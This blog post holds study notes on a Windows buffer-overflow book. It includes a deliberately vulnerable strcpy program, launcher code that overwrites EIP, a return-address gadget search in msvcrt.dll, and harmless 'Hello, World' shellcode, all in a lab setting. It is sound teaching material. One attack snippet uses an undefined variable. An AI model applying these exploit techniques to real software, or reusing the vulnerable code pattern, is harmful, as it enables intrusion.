<!DOCTYPE html><html lang="en-us" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>[Book] Windows Security Practice - Buffer Overflow | iss4cf0ng/ISSAC's blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><script src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.6.1/MathJax.js"></script><script>MathJax.Hub.Config({
 menuSettings: {
   zoom: "None"
 },
 showMathMenu: false,
 jax: ["input/TeX","output/CommonHTML"],
 extensions: ["tex2jax.js"],
 TeX: {
   extensions: ["AMSmath.js","AMSsymbols.js"],
   equationNumbers: {
     autoNumber: "AMS"
   }
 },
 tex2jax: {
   inlineMath: [["\\(", "\\)"]],
   displayMath: [["\\[", "\\]"]]
 }
});</script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="iss4cf0ng/ISSAC's blog" type="application/atom+xml">
</head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/About/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/Alien/"><span class="navItemTitle">Alien</span></a></li><li class="navItem"><a class="navBlock" href="/Tools/"><span class="navItemTitle">Tools</span></a></li><li class="navItem"><a class="navBlock" href="/tags/BlackHat"><span class="navItemTitle">BlackHat</span></a></li><li class="navItem"><a class="navBlock" href="/tags/code"><span class="navItemTitle">Code</span></a></li><li class="navItem"><a class="navBlock" href="/Notes/"><span class="navItemTitle">Notes</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>[Book] Windows Security Practice - Buffer Overflow</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2026-01-02T15:30:38.000Z" id="date"> 2026-01-02</time></div></span><br><span>Last Update: <div class="control"><time datetime="2026-01-22T16:25:41.921Z" id="updated"> 2026-01-23</time></div></span><br><span>Word Count: <div class="control">1.5k</div></span><br><span>Read Time: <div class="control">9 min</div></span></div></div><hr><div id="post-content"><h1 id="El-libro"><a href="#El-libro" class="headerlink" title="El libro"></a>El libro</h1><p align="center" class='item-img' data-src='/images/books/bufferoverflow/libro.jpg'><img src="/images/books/bufferoverflow/libro.jpg" width="500">
</p>

<h1 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h1><p>This article is used to keep notes and summaries of the book “Windows Security Practice - Buffer Overflow”.<br>The content will be continuously updated as I read through the book.</p>
<h1 id="Reflection"><a href="#Reflection" class="headerlink" title="Reflection"></a>Reflection</h1><h1 id="Chapter-1-Set-Up"><a href="#Chapter-1-Set-Up" class="headerlink" title="Chapter 1 - Set Up"></a>Chapter 1 - Set Up</h1><h2 id="1-1-VM-and-Windos-XP-SP3"><a href="#1-1-VM-and-Windos-XP-SP3" class="headerlink" title="1.1 - VM and Windos XP SP3"></a>1.1 - VM and Windos XP SP3</h2><h2 id="1-2-Tools"><a href="#1-2-Tools" class="headerlink" title="1.2 - Tools"></a>1.2 - Tools</h2><h3 id="Dev-C"><a href="#Dev-C" class="headerlink" title="Dev-C++"></a>Dev-C++</h3><p>According to the author, Dev-C++ is not recommended for software development. However, it is recommended for learning buffer overflow, as it produces executables with simpler structures.</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://sourceforge.net/projects/orwelldevcpp/">https://sourceforge.net/projects/orwelldevcpp/</a></p>
</blockquote>
<h3 id="Visual-C-2010-Express"><a href="#Visual-C-2010-Express" class="headerlink" title="Visual C++ 2010 Express"></a>Visual C++ 2010 Express</h3><h3 id="Visual-C-2013-Express"><a href="#Visual-C-2013-Express" class="headerlink" title="Visual C++ 2013 Express"></a>Visual C++ 2013 Express</h3><h3 id="NASM"><a href="#NASM" class="headerlink" title="NASM"></a>NASM</h3><p>NASM stands for <strong>The Netwide Assembler</strong>.</p>
<h3 id="OllyDbg"><a href="#OllyDbg" class="headerlink" title="OllyDbg"></a>OllyDbg</h3><h3 id="WinDbg"><a href="#WinDbg" class="headerlink" title="WinDbg"></a>WinDbg</h3><h3 id="Immunity-Debugger"><a href="#Immunity-Debugger" class="headerlink" title="Immunity Debugger"></a>Immunity Debugger</h3><h3 id="CFF-Explorer"><a href="#CFF-Explorer" class="headerlink" title="CFF Explorer"></a>CFF Explorer</h3><h3 id="HxD"><a href="#HxD" class="headerlink" title="HxD"></a>HxD</h3><h3 id="Process-Explorer"><a href="#Process-Explorer" class="headerlink" title="Process Explorer"></a>Process Explorer</h3><h3 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h3><h1 id="Chapter-2-Change-the-Procedure-of-a-Program"><a href="#Chapter-2-Change-the-Procedure-of-a-Program" class="headerlink" title="Chapter 2 - Change the Procedure of a Program"></a>Chapter 2 - Change the Procedure of a Program</h1><h2 id="2-2-Change-the-Procedure-of-a-Program-via-Buffer-Overflow"><a href="#2-2-Change-the-Procedure-of-a-Program-via-Buffer-Overflow" class="headerlink" title="2.2 - Change the Procedure of a Program via Buffer Overflow"></a>2.2 - Change the Procedure of a Program via Buffer Overflow</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">//File name: simplec001.c<br>#include &lt;stdio.h&gt;<br>#include &lt;stdlib.h&gt;<br><br>void func(char *str) &#123;<br>	char buffer[24];<br>	int *ret;<br>	strcpy(buffer, str);<br>&#125;<br><br>int main(int argc, char** argv) &#123;<br>    int x = 0;<br>    x = 0;<br>    func(argv[1]);<br>    x = 1;<br>    printf(&quot;x is 1\n&quot;);<br>    printf(&quot;x is 0\n&quot;);<br>    <br>    system(&quot;pause&quot;);<br>&#125;<br></code></pre></td></tr></table></figure>
<h2 id="2-3-Debugging-with-OllyDbg"><a href="#2-3-Debugging-with-OllyDbg" class="headerlink" title="2.3 - Debugging with OllyDbg"></a>2.3 - Debugging with OllyDbg</h2><p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.1.png'><img src="/images/books/bufferoverflow/2.1.png" width="500" alt="Setting parameter">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.2.png'><img src="/images/books/bufferoverflow/2.2.png" width="700" alt="OllyDbg: EP">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.3.png'><img src="/images/books/bufferoverflow/2.3.png" width="700" alt="OllyDbg: main function">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&gt; gdb --args SimpleC001.exe meaningless<br>(gdb) disassemble func<br>(gdb) disassemble main<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.4.png'><img src="/images/books/bufferoverflow/2.4.png" width="700" alt="gdb">
</p>

<ul>
<li>EAX: Accumulator Register</li>
<li>ECX: Counter Register</li>
<li>EDX: Data Register</li>
<li>EBX: Base Register</li>
<li>ESP: Stack Pointer</li>
<li>EBP: Base Register</li>
<li>ESI: Source Index</li>
<li>EDI: Destination Index</li>
<li>EIP: Instruction Pointer</li>
</ul>
<p>Here “E” stands for <strong>Extended</strong>.</p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.5.png'><img src="/images/books/bufferoverflow/2.5.png" width="1000" alt="OllyDbg: Pointer">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.6.png'><img src="/images/books/bufferoverflow/2.6.png" width="500" alt="OllyDbg: EAX">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.7.png'><img src="/images/books/bufferoverflow/2.7.png" width="700" alt="OllyDbg: 006B1708">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.8.png'><img src="/images/books/bufferoverflow/2.8.png" width="700" alt="OllyDbg: Stack">
</p>

<hr>
<p>Modifying the address:</p>
<script type="math/tex; mode=display">
\begin{align*}
0x00401548 + 0x00000014 = 0x0040155C
\end{align*}</script><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">*((int*)(buffer+0x20+0x4)) += 0x14;<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.9.png'><img src="/images/books/bufferoverflow/2.9.png" width="700" alt="OllyDbg: Stack Frame">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.10.png'><img src="/images/books/bufferoverflow/2.10.png" width="900" alt="OllyDbg: C++ code, modifying the return address.">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.11.png'><img src="/images/books/bufferoverflow/2.11.png" width="700" alt="Result: x is 0. It skips 'x is 1'.">
</p>

<p>Notice that the value <code>0x14</code> and <code>0x20</code> are depend on your OS.</p>
<h2 id="2-4-Basic-Buffer-Overflow"><a href="#2-4-Basic-Buffer-Overflow" class="headerlink" title="2.4 - Basic Buffer Overflow"></a>2.4 - Basic Buffer Overflow</h2><p>Code (You may remove <code>system(&quot;pause&quot;);</code>):<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#include &lt;stdio.h&gt;<br>#include &lt;stdlib.h&gt;<br><br>void func(char *str) &#123;<br>	char buffer[24];<br>	int *ret;<br>	strcpy(buffer, str);<br>&#125;<br><br>int main(int argc, char** argv) &#123;<br>    int x = 0;<br>    x = 0;<br>    func(argv[1]);<br>    x = 1;<br>    printf(&quot;x is 1\n&quot;);<br>    printf(&quot;x is 0\n&quot;);<br>&#125;<br></code></pre></td></tr></table></figure><br>Don’t forget to recompile your code.</p>
<p>Now we need to cause the program to crash. Before doing so, we need to configure OllyDbg:</p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.12.png'><img src="/images/books/bufferoverflow/2.12.png" width="700" alt="Options -> Just in time debugging -> Make OllyDbg just in time debugger -> Done">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.13.png'><img src="/images/books/bufferoverflow/2.13.png" width="700" alt="Input parameter.">
</p>

<p>Here, we input 48 characters of ‘A’ and then execute the program. As a result, the program is crashed:</p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.14.png'><img src="/images/books/bufferoverflow/2.14.png" width="700" alt="Program crashed.">
</p>

<p>Notice the hexadecimal representation of letter A is <code>0x41</code>. From the register window of OllyDbg, EIP is overwritten by letter A.</p>
<p><strong>If the input string can overwrite the EIP register, then the program has a buffer overflow vulnerability.</strong></p>
<p>A buffer overflow does not necessarily exist in every program. Even if it exists, it is not always exploitable. Exploitability depends on the environment, register states, memory layout, and operating system protections.</p>
<hr>
<p>In this example we are going to attack the vulnerable <code>simplec001.exe</code> from previous section (<strong>Notice that we use C++ in this example)</strong>:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">//File name: attack-simplec001.cpp<br>#include &lt;string&gt;<br>#include &lt;sstream&gt;<br>#include &lt;cstdlib&gt;<br><br>using namespace std;<br><br>int main(int argc, char* argv[]) &#123;<br>	string simplec001(argv[1]);<br>	string buffer_overflow(40, &#x27;A&#x27;);<br>	ostringstream sout;<br>	<br>	sout &lt;&lt; &#x27;\&quot;&#x27; &lt;&lt; simplec001 &lt;&lt; &quot;\&quot; &quot; &lt;&lt; buffer_overflow;<br>	system(sout.str().c_str());<br>	<br>	system(&quot;pause&quot;);<br>&#125;<br></code></pre></td></tr></table></figure></p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.15.png'><img src="/images/books/bufferoverflow/2.15.png" width="700">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.16.png'><img src="/images/books/bufferoverflow/2.16.png" width="700">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.17.png'><img src="/images/books/bufferoverflow/2.17.png" width="700">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB<br></code></pre></td></tr></table></figure>
<p>Again, the input string length depends on OS.</p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.18.png'><img src="/images/books/bufferoverflow/2.18.png" width="700">
</p>
Here, we have been successfully overwritten EIP with letter B. Notice that the hexadecimal representation of letter B is `0x42`


## 2.5 - Basic Shellcode
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.19.png'><img src="/images/books/bufferoverflow/2.19.png" width="700">
</p>
Here, we modified the value of both EBP and EIP. Notice that the hexadecimal representation of letter C is `0x43`.

---
We obtain the opcodes with WinDbg:
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; a<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.20.png'><img src="/images/books/bufferoverflow/2.20.png" width="700">
</p>

<p>Write assembly code. Press enter with empty command to exit.<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">77441b52 push esp<br>77441b53 retn<br>77441b54 <br></code></pre></td></tr></table></figure></p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.21.png'><img src="/images/books/bufferoverflow/2.21.png" width="700">
</p>

<p>Search <code>54</code> and <code>c3</code> in <code>msvcrt.dll</code>(<code>755f0000</code>~<code>756af000</code>)<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">0:000&gt; s 755f0000 756af000 54 c3<br></code></pre></td></tr></table></figure></p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/2.22.png'><img src="/images/books/bufferoverflow/2.22.png" width="700">
</p>
Hence, we can the value `75687448` to overwrite EIP. Consequently, CPU jumps to `75687448` and executes `54 c3` (`push esp` and `ret`).

The following code is our attacking code:
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#include &lt;string&gt;<br>#include &lt;sstream&gt;<br>#include &lt;cstdlib&gt;<br><br>using namespace std;<br><br>int main(int argc, char* argv[]) &#123;<br>	string simplec001(argv[1]);<br>	string junk(32, &#x27;A&#x27;);<br>	string ebp(4, &#x27;B&#x27;);<br>	string eip(&quot;\x48\x74\x68\x75&quot;); // msvcert.dll 75687448, push esp # retn<br>	string insructions(&quot;\xcc\xcc\xcc\xcc&quot;);<br>	ostringstream sout;<br>	<br>	sout &lt;&lt; &#x27;\&quot;&#x27; &lt;&lt; simplec001 &lt;&lt; &quot;\&quot; &quot; &lt;&lt; buffer_overflow;<br>	system(sout.str().c_str());<br>	<br>	system(&quot;pause&quot;);<br>&#125;<br></code></pre></td></tr></table></figure>

---
To avoiding the invalid address value in EBP:
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#include &lt;string&gt;<br>#include &lt;sstream&gt;<br>#include &lt;cstdlib&gt;<br><br>using namespace std;<br><br>int main(int argc, char* argv[]) &#123;<br>	string simplec001(argv[1]);<br>	string junk(32, &#x27;A&#x27;);<br>	string ebp(4, &#x27;B&#x27;);<br>	string eip(&quot;\x48\x74\x68\x75&quot;); // msvcert.dll 75687448, push esp # retn<br>	string instructions;<br>	instructions +=<br>		&quot;\xc7\xc5\x77\x77\x77\x77&quot;	// MOV, EBP, 0x77777777<br>		&quot;\xc7\xc1\xdf\x89\x16\x77&quot;	// MOV ECX,0X771689DF<br>		&quot;\x33\xe9&quot;					// XOR EBP,ECX<br>		&quot;\xc7\xc0\x77\x77\x77\x77&quot;	// MOV EAX, 0x77777777<br>		&quot;\xc7\xc1\x2b\x62\x37\x77&quot;	// MOV ECX,0x7737622B<br>		&quot;\x33\xc1\x42&quot;				// XOR EAX, ECX # INC EDX<br>		&quot;\xff\xe0\x42&quot;;				// JMP EAX # INC EDX<br>	ostringstream sout;<br>	<br>	sout &lt;&lt; &#x27;\&quot;&#x27; &lt;&lt; simplec001 &lt;&lt; &quot;\&quot; &quot; &lt;&lt; junk &lt;&lt; ebp &lt;&lt; eip &lt;&lt; instructions;<br>	system(sout.str().c_str());<br>	<br>	system(&quot;pause&quot;);<br>&#125;<br></code></pre></td></tr></table></figure>

# Chapter 3 - Change the Action of a Program
## 3.2 - From C Language to Shellcode

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#include &lt;stdio.h&gt;<br>#include &lt;stdlib.h&gt;<br><br>int main() &#123;<br>	printf(&quot;Hello, World\n&quot;);<br>	exit(0);<br>&#125;<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.1.png'><img src="/images/books/bufferoverflow/3.1.png" width="600" alt="Address of printf(): 75669E20">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.2.png'><img src="/images/books/bufferoverflow/3.2.png" width="600" alt="Address of exit(): 75656690">
</p>

<p>Convert “Hello, World!\n” into hexadecimal format:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&gt; python<br>&gt;&gt;&gt; &quot;Hello, World!\n&quot;.encode(&#x27;utf-8&#x27;).hex()<br>&#x27;48656c6c6f2c20576f726c64210a&#x27;<br></code></pre></td></tr></table></figure><br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">48 65 6C 6C<br>6F 2C 20 57<br>6F 72 6C 64<br>21 0A<br></code></pre></td></tr></table></figure><br>Assembly code:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">PUSH 0x210A0000<br>PUSH 0x6F2C2057<br>PUSH 0x6F726C64<br>PUSH 0x48656C6C<br>PUSH ESP<br></code></pre></td></tr></table></figure><br>Because little-endian is used in memory, the addresses must be reversed. Completed code:<br><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">PUSH 0x00000A21<br>PUSH 0x646C726F<br>PUSH 0x57202C6F<br>PUSH 0x6C6C6548<br>PUSH ESP<br>MOV ECX,0x75669E20  ; Load 75669E20 into ECX. This is the address of printf()<br>CALL ECX            ; Call printf()<br>XOR EAX,EAX         ; Load 0 into EAX<br>PUSH EAX            ; Load 0 into [ESP] for exit()<br>MOV ECX,0x75656690  ; Load 75656690 into ECX. This is the address of exit()<br>CALL ECX            ; Call exit()<br></code></pre></td></tr></table></figure></p>
<h2 id="3-3-Using-Plugin-to-Obtain-Shellcode"><a href="#3-3-Using-Plugin-to-Obtain-Shellcode" class="headerlink" title="3.3 - Using Plugin to Obtain Shellcode"></a>3.3 - Using Plugin to Obtain Shellcode</h2><p>We use <strong>mona</strong> and <strong>Immunity Debugger</strong> to obtain the hexadecimal shellcode.</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/corelan/mona">https://github.com/corelan/mona</a></p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">!mona assemble -s PUSH 0x00000A21 # PUSH 0x646C726F # PUSH 0x57202C6F # PUSH 0x6C6C6548 # PUSH ESP # MOV ECX,0x75669E20 # CALL ECX # XOR EAX,EAX # PUSH EAX # # MOV ECX,0x75656690 # CALL ECX<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.3.png'><img src="/images/books/bufferoverflow/3.3.png" width="800">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.4.png'><img src="/images/books/bufferoverflow/3.4.png" width="800">
</p>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">Full opcode:<br>\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\x54\xc7\xc1\x20\x9e\x66\x75\xff\xd1\x33\xc0\x50\xc7\xc1\x90\x66\x65\x75\xff\xd1<br></code></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">//TestShellcode.cpp<br>#include &lt;cstdio&gt;<br>using namespace std;<br><br>char shellcode[] =<br>&quot;\x68\x21\x0a\x00\x00&quot;		//PUSH 0x00000A21<br>&quot;\x68\x6f\x72\x6c\x64&quot;		//PUSH 0x646C726F<br>&quot;\x68\x6f\x2c\x20\x57&quot;		//PUSH 0x57202C6F<br>&quot;\x68\x48\x65\x6c\x6c&quot;		//PUSH 0x6C6C6548<br>&quot;\x54&quot;						//PUSH ESP<br>&quot;\xc7\xc1\x20\x9e\x66\x75&quot;	//MOV ECX,0x75669E20<br>&quot;\xff\xd1&quot;					//CALL ECX   <br>&quot;\x33\xc0&quot;					//XOR EAX,EAX<br>&quot;\x50&quot;						//PUSH EAX <br>&quot;\xc7\xc1\x90\x66\x65\x75&quot;	//MOV ECX,0x75656690<br>&quot;\xff\xd1&quot;;					//CALL ECX <br><br>typedef void (*FUNCPTR) ();<br><br>int main() &#123;<br>	printf(&quot;Starting to execute shellcode:\n&quot;);<br>	FUNCPTR fp = (FUNCPTR)shellcode;<br>	fp();<br>	<br>	printf(&quot;This line will not be displayed since we call exit()&quot;);<br>&#125;<br></code></pre></td></tr></table></figure>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.5.png'><img src="/images/books/bufferoverflow/3.5.png" width="1000">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.6.png'><img src="/images/books/bufferoverflow/3.6.png" width="700">
</p>

<h2 id="3-4-Using-nasm-shell-rb-from-Metasploit-to-Obtain-Shellcode"><a href="#3-4-Using-nasm-shell-rb-from-Metasploit-to-Obtain-Shellcode" class="headerlink" title="3.4 - Using nasm_shell.rb from Metasploit to Obtain Shellcode"></a>3.4 - Using nasm_shell.rb from Metasploit to Obtain Shellcode</h2><blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/fishstiqz/nasmshell">https://github.com/fishstiqz/nasmshell</a></p>
</blockquote>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.7.png'><img src="/images/books/bufferoverflow/3.7.png" width="700">
</p>

<h2 id="3-5-Using-NASM-to-Obtain-Shellcode"><a href="#3-5-Using-NASM-to-Obtain-Shellcode" class="headerlink" title="3.5 - Using NASM to Obtain Shellcode"></a>3.5 - Using NASM to Obtain Shellcode</h2><h2 id="3-6-Review-the-First-Shellcode"><a href="#3-6-Review-the-First-Shellcode" class="headerlink" title="3.6 - Review the First Shellcode"></a>3.6 - Review the First Shellcode</h2><p>Mostly, a PE file which compiled with Dev-C++ loads <code>msvcrt.dll</code>.</p>
<p>On Windows XP, a PE file typically have a fixed ImageBase.<br>However, starting from Windows Vista, ASLR randomizes the ImageBase.</p>
<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.8.png'><img src="/images/books/bufferoverflow/3.8.png" width="700">
</p>

<p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.9.png'><img src="/images/books/bufferoverflow/3.9.png" width="700">
</p>

<h3 id="Obtain-the-ImageBase-Address-of-kernel32-dll-via-PEB"><a href="#Obtain-the-ImageBase-Address-of-kernel32-dll-via-PEB" class="headerlink" title="Obtain the ImageBase Address of kernel32.dll via PEB"></a>Obtain the ImageBase Address of <code>kernel32.dll</code> via PEB</h3><p align="center" class='item-img' data-src='/images/books/bufferoverflow/3.10.png'><img src="/images/books/bufferoverflow/3.10.png" width="700">
</p>

